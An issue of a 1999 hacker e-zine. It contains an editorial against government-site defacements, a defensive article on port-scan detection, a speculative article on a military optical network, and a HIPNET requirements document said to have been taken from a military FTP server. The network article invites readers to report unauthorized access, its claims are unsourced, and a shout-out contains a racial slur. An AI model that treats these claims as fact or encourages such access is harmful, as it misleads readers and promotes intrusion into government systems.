Copy Link
Add to Bookmark
Report
Keen Veracity Issue 08
1
/* Keen Veracity...................................Volume 3, Issue 8 */
e e eeee eeee eeeee ee e eeee eeeee eeeee eeeee e eeeee e .e
8 8 8 8 8 8 88 8 8 8 8 8 8 8 8 8 8 8 8
8eee8e 8eee 8eee 8e 8 88 e8 8eee 8eee8e 8eee8 8e 8e 8e 8eeee8
88 8 88 88 88 8 8 8 88 88 8 88 8 88 88 88 88
88 8 88ee 88ee 88 8 8ee8 88ee 88 8 88 8 88ee8 88 88 88
88 Keen Veracity Technical Journal July 21st, 1999 88
88eeeeeeeeeeee. . Legions of the Underground . .eeeeeeeee88
[most of the editing done by headflux]
.-[ Keen Veracity, Volume 3, Issue 8 ]
|
|__Introduction
| |_ kv[1]; General Information..................................staff
| |_ kv[2]; Statement........................................optiklenz
|
|__Computer Security
| |_ kv[3]; Port Scan Detection..............................t0ucht0ne
| |_ kv[4]; Introduction to MoNet...............................uplink
| |_ kv[5]; Article on HIPNET..................................zipcode
| |_ kv[6]; Intrusion Detection Systems......................ProtocolD
| |_ kv[7]; Another IE Exploit?.................................ntwak0
| |
| |__Programs/Source Code
| | |_ kv[8]; tryseg.c.........................................guidob
| | |_ kv[9]; match.c...........................................icesk
| | |_ kv[10]; netsniff.c (reprint)...........................mnemonic
| | |_ kv[11]; liberty.c........................................guidob
| |
| |__Miscellaneous
| |_ kv[12]; Ode to JP....................................krankshaft
| |_ kv[13]; Top WWW Sites...................................ntwak0
|
|__Telephony/Radio
| |_ kv[14]; Intro to Loops.....................................hitman
|
|
|_ kv[i]; outro
kv[1]; /* General Information..................................staff */
SYSCON IS BACK AND IN EFFECT: http://www.legions.org/syscon for info
[posse]:
```````
cap'n'crunch
optiklenz uuuuuu uuuu
aphex guidob uuuuu uuu
[havoc] touchtone chiXy uuuuu uuu
lothos slfdstrct ntwak0 uuuuu uuu
headflux ProtocolD uuuuu uuu
kingbong touchtone uuuuu uuu
Kanuchsa uuuuu uuu
Digital Ebola uuuuuuuuuuuuu
duncan silver uuuuuuuuuu
uuu
[lou] www.legions.org
efnet - #legions come hang with
grouppiez, and other cracked out porno stars
- legions ircd still being tweak'd
[shoutouts]: no one in particular
```````````
[copyLeft]: whatever...
```````````
Download Pictures of Legions at Defcon7 from the following sites:
===============================================================
***| http://defcon.legions.org
***| http://www.legions.org/defcon7/index.html
ef-te-pee
================
***| ftp://www.underzine.com/rootfest/defcon/defcon7.html
----------------------------------------
call the authorities optik's drunk again
----------------------------------------
<cripto> gimme shouts next issue
<cripto> for being a p1mp.
<optiklenz> sure
<cripto> word.
<optiklenz> joe gotta hand cuff yur hoes doh
<cripto> nice zine, btw.
<optiklenz> so they dont be mewvin when i try to humpzorize em
<optiklenz> thnks
<cripto> articles with real substance.
<cripto> makes b4b0 look like dr. seuss.
-------------------------------------------------------------
it's just a matter of taste... Some people obviously have it.
-------------------------------------------------------------
kv[2]; /* Statement........................................optiklenz */
Something needs to be said...
First off...
Earlier this year an assembly of organizations decided
to release a joint statement "condemning" Legions. This
evidently was before any of them contacted Legions requ
esting information on what the true plight was. Because
of some iniquitous media converage a few people misunde
rstood our motives. This of course is in regards to the
past "China Human Rights incident".
We wanted to bring a tragic predicament to surface so
other people could speak out as well. The media was mis
informed when they reported about our goals to aid these
countries in their fight or freedom of speech. They (th
e media) stated we (Legions) wanted to damge certain com
puter networks in other parts of the world. We wanted to
help them with the situation concerning their lack of fr
eedom, and human rights why would we want to destroy or
damage their networks the same networks that give them what
little freedom they have to communicate as people. That
just makes no sense at all. I ask that the people who joined
to make the statement condemning Legions take that into
consideration and next time contact us so that we could discuss
things, and clear up misunderstandings. It's not a funny matter
when peoples lives, and reputations are at stake.
As hackers the
computer has built our lives, and in turn we have
built our lives around the computer we would never
choose to harm such a valuable resource. The term
hacker doesn't discriminate. You can be a federal
agent, but the best damn coder in the world and in
the sense of the word you'll be a hacker. Bill Gates,
a hacker turned billionaire. Software designers, security
specialist the people who help protect your networks these
people are hackers. " Information, and data
is to be cherished, (for it can only build you not hurt you)
cultivated and developed not to be annulled or locked
up. Hacking is an expansive applied knowledge in any
technical field. Destruction, and the unschooled acts
of those who live with out moral are what separates the
"hackers"(those who's main purpose of life is to learn,
expand, and apply what they learn) from those that go
as far as turning the computer on."( -The previous quoted
statement was excerpted from Keen Veracity 3 www.underzine.com).
Something serious is going on at the moment. A string of "attacks"
against our own government. And till now no one has said anything.
The actions of these groups are sincerely
half-witted, and absurd for it will at the end accomplish nothing except
a few more long term jail sentences. The current actions of
these self-proclaimed "hackers" have me infuriated.
The people DOS'ing government sites, and defacing mil, and
gov domains, and damaging information these people
aren't hackers they are nothing more than unschooled
adolescent teens with nothing better on their hands.
They are an endangerment to the true aspect of computer
science dealt with by the hacker community.
Call what they are doing what you want, but don't call
it "hacking" because it's not. So many articles have
surfaced which referred to what these cracker cults
are doing as "hacking" ex; "Hackers attack government" -
"Hackers strike again" (false) Call them destructive call them by
their first name but for the sake of god don't just yank
out the term "hackers" for a better story for the sake of
god don't defile the name "hacker" for your personal gain.
A hacker lives by a strong code of ethics. We wouldn't be
issuing this statement if we didn't.
A government investigation is currently pending on the above matters
If we dont do something about this now the government will surely
hold us accountable, and I'm not talking jail time. We have a lot to
lose if we dont stop these people from making us look bad. Though
we are not affliated with them directly certain mainstream
media has left a misleading trail. Some of our rights as computer
partisans may be a stake here. With that said I ask that all sites
that archive these senseless hacks suspend documenting these fatuous
acts for the time being. The script kiddies that go
out and target government and military servers are media crazy, and
you are only adding fuel to their fire by flashing their work to the
public. A note to the lamers This is where it ENDS... In the
end it's what you choose to do that makes you who you are.
So make sure what you choose to do doesn't make you look like
an ass.
http://www.hackernews.com/archive/1999/noaa/index.html
http://www.hackernews.com/archive/1999/army/index.html
http://www.hackernews.com/archive/1999/monmouth/index.html
http://www.hackernews.com/archive/1999/argonne/index.html
http://www.hackernews.com/archive/1999/nswcl/index.html
http://www.hackernews.com/archive/1999/senate2/index.html
http://www.hackernews.com/archive/1999/bnl/index.html
http://www.hackernews.com/archive/1999/doi/index.html
The above is an archive of recent government, and military site
defacements done by what seems to be comparable to the works of
5year olds...
Look at the archived sites, and tell me something doesn't need to be done.
Just letting people know we aren't going for their childish actions.
We dont advocate any of the trash being done by these uninspired idiots.
we're "hackers" the other white meat!
------------------001----------------------------------------------
the below is an email, and responce excerpted from Keen Veracity 4
-------------------------------------------------------------------
[mail] <plankton>
Do you still hack?
[responce]
Well it depends on your analogue of hacking. By the authentic
formalization I "hack" everyday. Whether I'm coding, or doing
Network checks it's still hacking. Hacking has little to do
with the "illegal" entry of computer systems apart from the
Technical, and systematic aspect of it. Illegally accessing a system
for no intended reason is not something I advocate or
advise performing. What I suggest achieving is going out, and
learning, and questioning the system itself before trying to exploit it.
And even once you feel you have a broad knowledge of the system make sure
you use what you know to build things, and not fuck things up.
System admins who are affected by crackers turn to hackers in
order to secure their systems. They turn to the philosophies,
documents, and programs written by "hackers"... Let's not
make them look the other way. We are here, and we are skilled.
What your brain dead system administrator can do in a week we can
accomplish in a matter of minutes more practically. That's the message
that should be put across. One of positively not one that says "Were
going to take you down." Read my introduction in Keen Veracity
3 I go into greater detail on the subject at hand.
http://www.t00ned.org/optik/kv/kv3.txt
-Steve Stakton <optiklenz>
Steve Stakton - <optik@shockimaging.com> -(optiklenz)
-Head Security Advisor for NACC
Legions Of the Underground - Our title name is not meant to seem
dark. Don't get the misconception that we are some sort of
cult or only wear black. The computer Underground is a symbol
something that is important, and we treasure it's existence so in
it's honor we use the name Legions Of the Underground.
We are just a bunch of computer enthusiast who
enjoy working together. Nothing more nothing less.
-----BEGIN PGP PUBLIC KEY BLOCK-----
mQGiBDR6E3wRBADHm2aiODOCowgDqXdcFvooCTrQe6tDPqznXChCO1p0t12hhQZe
0C+/xBorkJXlqOaDadmUQVZP3Kij97SOTWU1AS1SPSTzF6VAylHalGz9iUHjxa7g
SSAVrLUMngWG7hxnz7lBHFIQ8iQPjWvK5qhEQ9vcBF9ped9StPRsZlljIwCg/02Z
XXrVaJUtWAxUaAARUdPt0FsEAKyhGuQA1HgGWM/GQxpvBvmDqHkNGxM9YyrF1Dg1
PWAoNuG8GdJazj18c2AODp68NwPH0dUYTxKc4ejR//OcOfl1HRfE0thJEDpqkSyQ
2iobKGkYdmug666pe0Xr3wkgBE+rnzC3RLlUdnRAu25MuEqlc6yRWAT0YH/Pl9IB
eDRGA/4uAuFiEiyfd3Djhi7Wwh8/qiG7SChW0arEXq3RqHQqd3EaVR1FgNzCtvxg
kK2mY07XeSX2fjlWo4ynrBdl5QXbOn9X+GzDcw1z9FBVQHaY0EJMoE0fb53bTyCG
0bdCMTid1DUKhJeekW6cPZvRQlu5IjH/+FVT9S38UsAMMwwrCrQlU3RldmUgU3Rh
a3RvbiA8b3B0aWtsZW56QGxlZ2lvbnMub3JnPokASwQQEQIACwUCNHoTfAQLAwEC
AAoJEGgSVovfJxzQFfcAn0WybtLnFw9jf9agk7xUaikjEjLkAKCYfA1rx/SXP5Je
v5R0+ZVMqIGiibkCDQQ0ehN8EAgA9kJXtwh/CBdyorrWqULzBej5UxE5T7bxbrlL
OCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1WV/cdlJPPT2N
286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01uejaClcjrUGvC/
RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJI8BD8KVbGI2O
u1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaGxAMZyAcpesqV
DNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwACAgf+OCRz2nG+
SSCrgZY2nIGz68SO+2h3weFMzdBSWQDjZ5Fa7GjRBPeTRQvectPvSqcwjeZTq8DE
1AVI/oFw1mChgfV7CgQuC+P0OK+jr6tIwyhM6gdo5NEdD7/uLWJfFi2l/AP4skVv
ydmg1KGlxjvtjOFKhOGoV2vSTPRGn1l1lCzBZPRur0xTtNwk5b54o8g/NlMEsO/p
/P6CRP4J1WlDkH66jST+ygAYNN0AtRy0eEPUxu7+dYC4OgT0xCcglCqKf7hnMGrf
s/I2MHBbhSmdtcW5pLYcEb8iwXEitGN+plAy+OZrygJ4ytFAdnL2r9NmegUPTYz0
3t4M3hiITUmiP4kAPwMFGDR6E3xoElaL3ycc0BECKBQAoKqOQNZ82RmU4rsZRM9l
a6QdQeSVAJ469y3cLO1eU5oMYpLdvSGevh0mSg==
=cpan
-----END PGP PUBLIC KEY BLOCK-----
kv[3]; /* Port Scan Detection..............................t0ucht0ne */
Port scanning, Everyone does it. Whether it's an administrator trying to
find out what is being spoke on a remote node, or a 15 year old script kid
looking for exploitable boxes, port scanning is the first step in
identifying services on a networked machine. I've always been bewildered
when I've had conversations with network security experts and semi-aware
administrators who explain to me that they've invested a lot of money and
resources into the latest firewall technologies and intrusion detection
software, yet never even considered port scan detection tripwires. Being
aware of port scans can alert any competent sysadmin of potential
compromise long before it's too late. With the wealth of software out
there dedicated to finding everything from open NetBIOS shares to web
server exploitation, port scan detection software becomes more important
then ever. Furthermore, it's safe to say that making your boxes layer 3
aware is a good idea. Even a wayward ICMP Echo can be the first sign of a
lurking intruder. In this whitepaper, I'd like to talk about several
packages that encompass making your network "probe" aware. I will talk
about the pros and cons of automated defenses employed by these packages,
plus give a general overview of why itÕs a good idea to also be layer 3
aware.
The first important thing to recognize is that port-scanning software has
made some significant advances in the last year or so. They have become
stealthier, faster, and smarter. For example, two years ago, most people
were using Strobe written by Julian Assange
(ftp://suburbia.net:/pub/strobe.tgz). It was quick and dirty (possibly
still the fastest port scanning software to date), and would spit out the
services spoken at the other end. Now, most people are using NMAP, written
by Fydor (http://www.insecure.org/nmap), which not only does port scan
detection, but will also do TCP fingerprinting, compare the fingerprint to
it's database, and guess what O/S is at the other end. It's capable of a
myriad of different scans, including a stealth scan that can beat a lot of
port scan detection software. So, with one little piece of software, a
potential cracker can identify the services being spoken on your networked
host, what operating system is being run, and do it undetected. Scared?
You should be. In many aspects, it's pointless to remove operating system
specific banners from your daemons because software like NMAP and Queso do
a great job of identifying the O/S through TCP fingerprinting.
Unfortunately, a lot of admins and network engineers aren't even familiar
with these programs, but those that are, realize how important it is be
atleast semi-aware of when these tools are being used against them.
"So, T0uchT0ne, what can we do about this?" I hear you asking. I'm glad
you asked, because we now are going to discuss several options that are
available. My personal favorite is Abacus Sentry
(http://www.psionic.com/tools/portsentry-0.90.tar.gz). It's a piece of
software written by Craig Rowland as part of the Abacus Security Project.
Sentry has the ability to detect port scans, and implement automated
defenses. These defenses can encompass everything from entering the
offending machine into your routing table (routing the host into oblivion)
to adding the attacker to the hosts.deny file. Even more exciting, is the
ability to add custom commands to the Sentry configuration file that would
allow you to be paged or emailed in the event of a port scan trigger.
To understand what happens with port scan detection software, we need to
cover some basic concepts with how a TCP connection is established. Host A
sends a TCP segment to Host B with the syn bit set to 1, and the ack bit
set to 0. This makes sense, since the first step in a connection is to
syn"chronize" Host A and Host B. Host B then responds with a TCP segment
(notice that I'm not using the term packet, because to TCP, there is no
such thing a packet, don't make this mistake.) that has the syn bit set to
1 and the ack bit set to 1. After the initial handshake, both hosts sends
the TCP stream with the syn and ack bits set to 1 right up until the
teardown of the connection. This is a very simple explanation, Suffice to
say, I've not gone into explanation of how sequencing works, etc., because
this is not a whitepaper on TCP, but on port scan detection. Most port
scanners work on this simple principle, of opening TCP connections to a
host, and seeing what answers on the other side. The secret to port scan
detection is making sure you have something that is listening on ports
that don't normally have daemons installed. Since we know FTP is usually
on port 21, and there is already an FTP daemon installed on port 21, we
canÕt bind a sentry device on it, since no two daemons can monitor the
same ports. Fortunately, the good news is, the implementation of port scan
detection is incurred through the basic understanding that most intruders
are scanning a range of ports from 1 - 1024 (and higher) in a sequential
manner. Since we can't bind to 21, let's bind to 22, 23, 24, 25, etc.
(excluding ports with listening daemons). If a connection is made to port
22, and we don't have a service on port 22 (which we do, but it's our
sentry software) then we know there is a good chance that a port scan is
being run. Of course, you don't want to trigger your defenses based on one
un-used port. That is why Abacus Sentry allows you to set the "trigger".
For example, on my hosts, I usually set a trigger of 2, so that it takes 3
consecutive ports with no services on them to be hit before you get
entered into my hosts.deny file or routed to nowhere.
I hear you calling foul. Yes, but I could spoof my source address to be
your upstream router, and the next thing you know, your machine is cut off
from The Internet. True. You could. This is one of the downsides of port
scan detection software. It can be used against you to deny your service.
This shouldn't stop you from using it. Here is why.
First off, with Sentry, there is a file called "hosts.ignore" that allows
you to configure the detection software to never take action on specific
hosts. I've gotten into the habit of tracerouting out of my network to
different hosts, and recording which routers within the upstream I usually
go through. I enter these routers IP addresses into my hosts.ignore file.
This isn't foolproof, but for the most part, does a lot more good then
bad. For the record, in the 2 years I've used Abacus Sentry on a myriad of
different networks, I've never been the victim of a DoS attack where
Sentry was used against me. My opinion is that (and this is also the
opinion of the author of Abacus Sentry) is the benefits of using port scan
detection software far outweighs the cons.
I also believe in using JAIL (Just Another IP Logger), which you can find
at www.genocide2600.com/~tattooman using their search engine. Logging ICMP
traffic is the mark of a good security admin. Sure, you don't need to log
all ICMP traffic, but logging echoes and destination unreachables is a
sure way of catching the first steps in an attack. Granted, most echoes
and other ICMP traffic is legit, but when you see a ping from some host in
Germany, and you know you don't have any customers or users in Germany,
something could be up.
Configuring your syslog daemon properly, and logging all your scan
detection software to one file can allow you to write some pretty snazzy
perl scripts to boot. I'll leave this to your imagination.
If you have any questions, or want to offer me some good advice on past
experiences you've had with detection software, email me at
root@t0ucht0ne.ca. I'd love to hear from you.
Shout Outs: All of Legions of the Underground and #legions, Drown, Mopar,
most of #hacking, Stratus (where ever you are), Kweiheri (you will be
owned by Kwei), NodeRaTz, and The White Niger (pronounced Ni-Jer).
* T0uchT0ne #
[-------------------------------------]
kv[4]; /* Introduction to MoNet...............................uplink */
01001101 01101111 01001110 01000101 01010100
.-.-.-. .----. .-..-. .---. .---.
| | | | | || | | .` | | |- `| |'
`-'-'-' `----' `-'`-' `---' `-'
Information compiled and written by lowtek aka uplink
of
Legions Of the Underground
http://www.legions.org
01001101 01101111 01001110 01000101 01010100
Introduction
MOnet (Multi-wavelength Optical Networking Technology) is about the most
advanced network that is in progress at the moment besides SOnet. It
combines all of the government/military applications. MOnet is connected
to many military domains. Many bell RBOC's and Private Telcom Companys
are working on the project together such as:
AT&T
Bell Atlantic
BellCore
Bellsouth
Lucent Technologies
Pacific Telesis
SBC/TRI
NSA
DARPA
MOnet is being put into progress in WASHINTON D.C. and is a 100 million
dollar project from good old .mil (dont you just love where your tax's are
going?) it is funded by ARPA (advanced research projects agency) Monet is
basically SOnet but it has been improved. The way it was improved is that
it signals data through wave lengths of light. This way of transporting
data is very fast and very effieciant.
The MOnet in Washington is interconnecting Bell Atlantics Silver Spring
Labratory also the Naval Research Labratory, and the National Security
Agency. This network is being expanded all the time to group together
other such government groupings. The New Jersey MOnet at the moment is
interconnecting The Red Bank of New Jersey and is currently been tested at
the speed of 2.5 G/bits transmission.
Impact
Assessing Multi-wavelength Optical Networking (MONET) for commercial
viability and Government applications Balanced approach with focus on
economics & architectures, enabling technology, and networking testbeds
Demonstrating networking through experimental interconnected networking
testbeds (in NJ and DC) Strong team representing equipment manufacturers,
management software developers, and network operators Technology transfer
through commercialization by partners
This shows MOnet's actual gates and connections:
NSA
|
DARPA |
| |
| |
| |
| ----------------------------- |NASA
| | | |
--------| | |
DISA----------------| |------|
--------| MOnet |------------------GateWay
| | |------|
| | | |
| | | |
| |___________________________| |
| | |DIA
DISA |
|
|
|
NRL
This shows MOnet at its last stage complete which includes DIA, NRL, DISA,
NASA, and DARPA. These are all very important military operating groups
that provide the power of MOnet.
And whats this GateWay? huh? ohh so there is an actual way into the
system. yes there is but to get into MOnet is to be able to pretty much
hack anything. This system does not only use high DES encryption but also
uses hardware encryption (just like SIPERNET). These gateways
supposedly can be accessed through dial-ups in Washington D.C. and New
Jersey also through a domain that is hosted by MOnet.
c0mputer
|------| Logging on via
| | -----> ------>
dial-up connection | |-----------------|the
/----------------|------| | Internet
/ This represents a |
\|/ computer logging on via |
| the internet and via dial-up |
\|/
|
\\//----------------------------|
| | \\//
| | |-----GateWay Through the
| | | Internet
Modem Pool | |
| |
| |
|--------------|
|
|
|============================================|
|Dial-up connections and internet connections|
| Bundle together and transfer straight into |
|--| MOnet |
| |____________________________________________|
| |
| |
| |____________________________________
| | |
*------------------> | |
| MOnet |
| |
|____________________________________|
This is a security threat that it can be accessed over the web because if
you do this you may enter MOnet without having to deal with the
encryption. Now only some .mil domains and only some .gov also. If you
reach these or get access any other way please e-mail me so I can update
this text at lowtek@uswestmail.net
MOnet will continue to grow within the United States and start to progress
to other buisness's. This network is still in its starting stage but is
finally becoming up to date a bit. I could not find any other info on
this subject (considering the fact that they want to keep it secret).
[-------------------------------------]
kv[5]; /* HIPNET........................................... .zipc0de */
I found this file on a military ftp server, which I
thought was very interesting so I saved it along with
other documents, as it turns out it's on the HIPNET,
which is a military network used by our government.
If you have some more information on the HIPNET please
e-mail me at zipc0de@hotmail.com and I'll include it in
my further text files on military/government networks.
As for now enjoy the file and don't get into trouble :]
HIPNET User Requirements
Revision 4.0
1. Introduction
The High Performance Network (HIPNET) seeks to develop a reliable
multicast transport protocol and IP QoS mechanisms which satisfy
requirements of US Navy and French MOD applications. The applications
are multimedia in nature and include: bulk file transfer, image
transfer, audio/video, email/messaging, interactive planning missions
(whiteboarding) and simulations, realtime data transfer,
teleconferencing and others. The requirements that these applications
impose on the transport protocol and the IP QoS facilities are
examined in this paper. The general requirement is a reliable
multicast service, yet, there are many variations of this service.
There are two highly variable aspects to a reliable multicast service:
reliability which spans a spectrum from best effort to absolute and,
ordering, which might mean anything from simple source delivery to causal,
total ordering. Several existing protocols provide reliable multicast
service, yet none has achieved the status of open standardization
acceptance. One overriding requirement of the US Navy user community
is the requirement that the reliable multicast service be provided by
a protocol that is accepted as an open standard, much as TCP and IP
are in today's Internet.
This paper is a culmination of a three-stage process. The first is to
define a chart of communication characteristics that can be used to
distinguish applications relative to their requirements (section 3).
The second is to define a list of generic applications that encompass
the totality of all envisioned applications and then to apply the
characteristics chart to each of them (section 4).
2. The Operational Environment: Communication Channels
Consideration must be given to the characteristics of the
communication channel over which the data will be transmitted.
The communication channel characteristics for the US Navy and
French MOD vary widely, depending on the operational environment,
and range from low data rate, simplex channels to high capacity,
ATM channels. Part of the channel characteristics could include
asymetrical networks where the data channel transfer rate between
sender and receiver is different than the rate between receiver andsender.
This would provide a communication environment that is
vastly different than the normal communication channel characteristics
which could include Ethernet, FDDI or ATM. Therefore, each
application must be able to specify those critical characteristics
that the communication channel must support in order for the
application to be able to meet the mission requirements.
The project, however, must focus on a subset of this entire
range in order to live within budget and time constraints, therefore,
the operational environment identified for HIPNET is ATM and
IP over ATM.
3. Communication Characteristics
The user applications can only meet its mission requirements if the
underlying communication architecture provides the mechanisms to either
define or control a specific characteristic that is needed to meet the
specific requirements of the user application. Some of these mechanisms
could be located within the user application itself, the underlying
transport service or as part of the network interface. There are
tradeoffs in determining the optimum location for each of these
mechanisms since each location may have significant performance
or user compatibility requirements. Specific characteristics are outlined
in the following paragraphs. As part of the user applications requirements,
the user may wish to send data to either one receiver or multiple
receivers. Depending upon how this mechanism is implemented, this
could be accomplished using one protocol architecture that provides
both capabilities or two separate protocol architectures.
3.1 Group Management
The key issue in group management is: does the application need to
identify the receiver group, i.e. have group knowledge? The
knowledge could be total, partial or none. If the knowledge is
total, then the group is said to be known. If the knowledge is
partial, then the group is said to be partly-known. If no knowledge
of the group is required, the group is unknown.
Multicast groups could consist of fixed or dynamic memberships.
The management of the groups could take place external to the
transport protocol and in some cases be manually performed. Any
protocol running over IPv6 has the IGMP (Internet Group Management
Protocol) available that provides network level functions for
joining/leaving/routing of groups. IGMP is sufficient in many
cases, but, if the application needs any control over the membership,
or monitoring of the membership, such capability must be performed
above IGMP. The size of the multicast group, the method of either
joining or leaving the group, and the responsibility for maintaining
the configuration of the group are characteristics that could
be different between specific user applications that would still
use a common reliable multicast protocol. An additional requirement
could include the ability to support multicast receivers who may
temporary leave the multicast group but want to maintain current
with data that was transmitted while they were not part of the
multicast group.
Applications define a group managment policy that may allow dynamic
joins; may limit admission to a multicast association to a subset
of the participating nodes or may not allow any nodes outside of a
fixed membership to join. The join/leave policy is also affected
by the reliability constraints, for example, an application may
require atomicity: the ability to deliver within a specified
interval once it's deliver to one of the group, to all members
of the group. Since the policy of group membership is so application
dependent, it makes sense to not implement group policy in the
protocol stack, however, this does not relieve the protocol stack
of responsibility to provide necessary group management funcitonality
for application use.
An event like a node joining or leaving a multicast group may or
may not require notification depending on the reliability
constraints and security policies. The notification may be required
by a central controlling node ( a server or master side) or it
may be required by the rest of the group. The policy will be
established by the application, however, the tranport layer may
be required to have mechanisms necessary to effect such events.
3.2 Topology
Applications differ in their requirements for data flow
direction. Some applications (e.g. broadcast TV) involve a
single transmitter and a group of receivers. This arrangement is
referred to as point-to-multipoint (PT->MP) communications.
Another arrangement is to allow the receivers to transmit back
to the sender (MP->PT) (sometimes referred to as concast), but not
to each other. Yet another is the topological configuration in
video teleconference which is multipoint-to-multipoint (MP<-->MP).
3.3 Scalability
Scalability makes the mechanisms necessary to implement a reliable
multicast and an IP QoS an issue. Multicast's most basic benefit
(that the number of transmissions is reduced from the unicast case)
may be negated if acknowledgements are required from all receivers.
There are schemes for minimizing the amount of control packets from
receivers to transmitters and for limiting the number of retransmissions,
however, the basic dilemma remains. One scheme is to have the
receivers send a negative acknowledgement (an explicit request for
retransmission) instead of positively acknowledging each packet,
however, the NAK algorithm may also degrade under implosion given a
sufficiently large receiver set. There are schemes for limiting
NAKs as well as ACKs, and often hybrids are proposed. A tree
strucutured set of proxy receivers where the proxies assume
responsibility for reliable delivery is one such scheme.
Some applications negate the scalability issue if the number of
participants is guaranteed to be small. An example would be email
multicast on an organizational basis where the number of
organizational units is small (say less than 15). Another example
is a video conference in an N X N configuration (all participants
are both sender and receiver), and might not consist of more than
15 people.
On the other hand, applications that execute in small-scale groups
today may need to accommodate large groups tomorrow because of
the explosive growth of the Internet and its associated applications
and unforeseen uses of those applications. Put another way: it's
difficult to predict future uses of technology based on past experiences.
The Internet itself, for example, was created primarily to service
file transfers and remote logins. Only after the technology was
created and utilized, did researchers realize that its main use would
be for the exchange of email (and, subsequently, access to the World
Wide Web).
3.4 Data Ordering:
The delivery of data from the multicast sender to the multicast
receiver may require that the delivery service support a range of
ordering including none, source, causal, or total ordering. Source
is an ordering that a unicast transport protocol like TCP would
provide by delivering messages between a pair of participating
endpoints in the order that they were transmitted. Causal is an
order that guarantees that all messages that are related are ordered,
such that, a receiver would not receive a particular message if
all related messages had not previously been delivered. Total
order means that multiple streams from multiple senders are delivered
to each receiver in the same relative order. There are often
requirements in distributed processing for variations on these
ordering properties for the purpose of attaining consistency,
fault tolerance, and stability. The support of total or causal
ordering typically requires the transport protocol to provide a
timestamp of some sort.
3.5 Reliability Range:
As stated earlier, the user application may require a range from an
absolute guarantee that all receivers have received the data to the
best effort reliability provided by the transmission characteristics
of the communication channel. Absolute reliability requires
acknowledgements for all data packets transmitted and implies total
knowledge of the receiver set. There are partial reliability
requirements imposed by some applications such as a k-reliability
mode wherein data transmission is successful if k receivers acknowledge
the message, Some applications may impose the requirement that a
majority of receivers acknowledging receipt is sufficient. Another
aspect of reliability is that of atomicity: if the message is
delivered to any in the receiver set then it must be delivered to
all members of the set. This could be the case, for example, in a
distributed database application where consistency is an important
requirement. Data may require a reliability mode of most-recent
(or freshness) that requires reliability but only within a latency
bound (a lifetime is associated with the data).
The method of assuring reliability must be balanced against other
requirements placed by the user on the communication channel. This
may become a negotiated function between the user application and the
underlying communication channel. In addition, the definition of
reliability may have to be established by either the user application
as a multicast sender or the user application as a multicast receiver.
3.6 Quality of Service (QoS):
A QoS capability might make use of a resource reservation mechanism
which permeates the communication protocol layers such that a certain
level of performance is guaranteed. QoS parameters include latency,
throughput, jitter, precedence, reliability and capacity.
Applications that don't require QoS are satisfied with only best
effort delivery services.
The characteristics required by the user application of the
communication channel may be defined as individual items or they
could make up a single QOS requirement that is passed from the
user application to the underlying communication channel architecture.
A standard format may be required so that each user application
is not required to develop their format for defining specific
characteristics for the communication channel.
3.6.1 Communication Channel Throughput:
The user application may require that the communication channel
support a required transmission rate, or throughput, from a
sender to either a single or multiple receivers. The throughput
rate might be expressed as a burst rate and/or a sustained rate.
The rate reflects the applications ability to inject traffic
into the network. The acceptable rate might vary depending on
the available resources, for example, a video conference over
a T1 circuit might specify its requirement as a 128 Kbps service;
whereas, the same conference over an ATM circuit might require 1
Mbps service. This reflects the fact that the user's perception
of a required QoS might change relative to his knowledge of the
resources available. The ability of the communication channel to
support a specific transmission rate may require negotiation between
the user application and the underlying communication channel.
3.6.2 Communication Channel Latency:
The user application may require that data transmitted by the sender
must be received by either a single receiver or multiple receivers
within a specific delay. The latency could be expressed on a
per-session or per-message basis. The application can indicate
the minimum delay that will be noticable to the application. This
provides information to the negotiation process that can then
determine when to cease the negotiation for the requested latency.
The distance from sender to receiver will strongly influence
achievable delay, thus, the application may need to negotiate the
delay parameter depending on the communication path available.
3.6.3 Communication Channel Jitter:
Jitter is the variation in the end-to-end delay caused principally
by media access delays and queueing delays. Jitter can be
compensated for by adding a variable delay at the receiver.
Jitter is a concern for streams (like audio and video) that
require synchronization. Jitter is also an indication of the
amount of congestion in the net and may provide important feedback
to the QoS mechanisms..
3.6.4 Precedence/Priority
Applications often need to expedite delivery of certain messages.
This could be on a per-session basis or on a per-message basis.
Some applications need to define the importance of their data
according to a system-wide scheme. If the network media supports
priorities and the operating system is capable of real-time
performance, end-to-end delays can be bound.
3.6.5 Reliability
Foreward error correction (FEC) techniques are used to guard
against errors by including with the data transmissions redundant
data bits which can be used by the receiver to detect, and, in
some cases, correct, certain bit errors. FEC provides reliability
at the expense of channel bandwidth and transit delay, but is
helpful when applications cannot tolerate retransmissions.
The error characteristics of the communication channel determines
the degree of redundancy required. Noisier channels require more
redundancy. The QoS parameter of reliability, therefore, is
communication communication channel dependent.
3.6.6 Capacity
The QoS throughput parameter dictates a certain network level
capacity. For example, a video conference might specify a
throughput requirement of 1 Mbps. The network QoS mechanism
would need to choose a capacity range above 1 Mbps. The
communication environment, however, might limit the application
to a certain capacity, therefore, this parameter is also
communication channel dependent.
4.0 Applications:
There are many different user applications that could be specified
as using data transmission protocols. They have been developed
to meet different mission requirements however, as an combined
group, they could have common or different requirements for the
communication channel based on the need of a specific mission
requirement. Rather than look at the requirements for the user
application as defined in a specific mission, the user applications
data transmission requirements can be generalized in terms of the
type of data to be transferred. These data types are:
a. Text Message/Email
b. File/Image Data Exchange
c. Voice/Video Conference
d. Voice/Video Broadcast
e. Interactive Multi-Media
f. Time-sensitive Data Exchange
g. Time-critical Data Exchange
h. Replicated Data Base
It is helpful to map military applications in each of these
classes to commercial applications:
Generic Application
Commerical Applications
Military Applications
Text Messaging/Email
Email, News, WWW
DMS,JMCIS,GCCS,APS
File/Image
Weather maps (imm)
JMCIS,GCCS,DMS
Conference
vic,vat,wb
VTIXS
Broadcast
public radio,freeway traffic
JDISS, JMCIS
Interactive Mulitmedia
vic,vat,wb
GCCS
Time-sensitive
virtual games,stock quotes
JMCIS
Time-critical
air traffic control,stock quotes
combat systems
Realtime DB
distributed process, stock quotes
JMCIS
In the sections that follow, each application is evaluated according
to the characteristics chart developed previously. It is not possible
for the project to address each of these applications or application
classes. The project's focus will be limited to non-realtime
applications like bulk file transfer.
4.1 Text messaging/Email
4.1.1 Application Use
Applications in this category include official organizational messages,
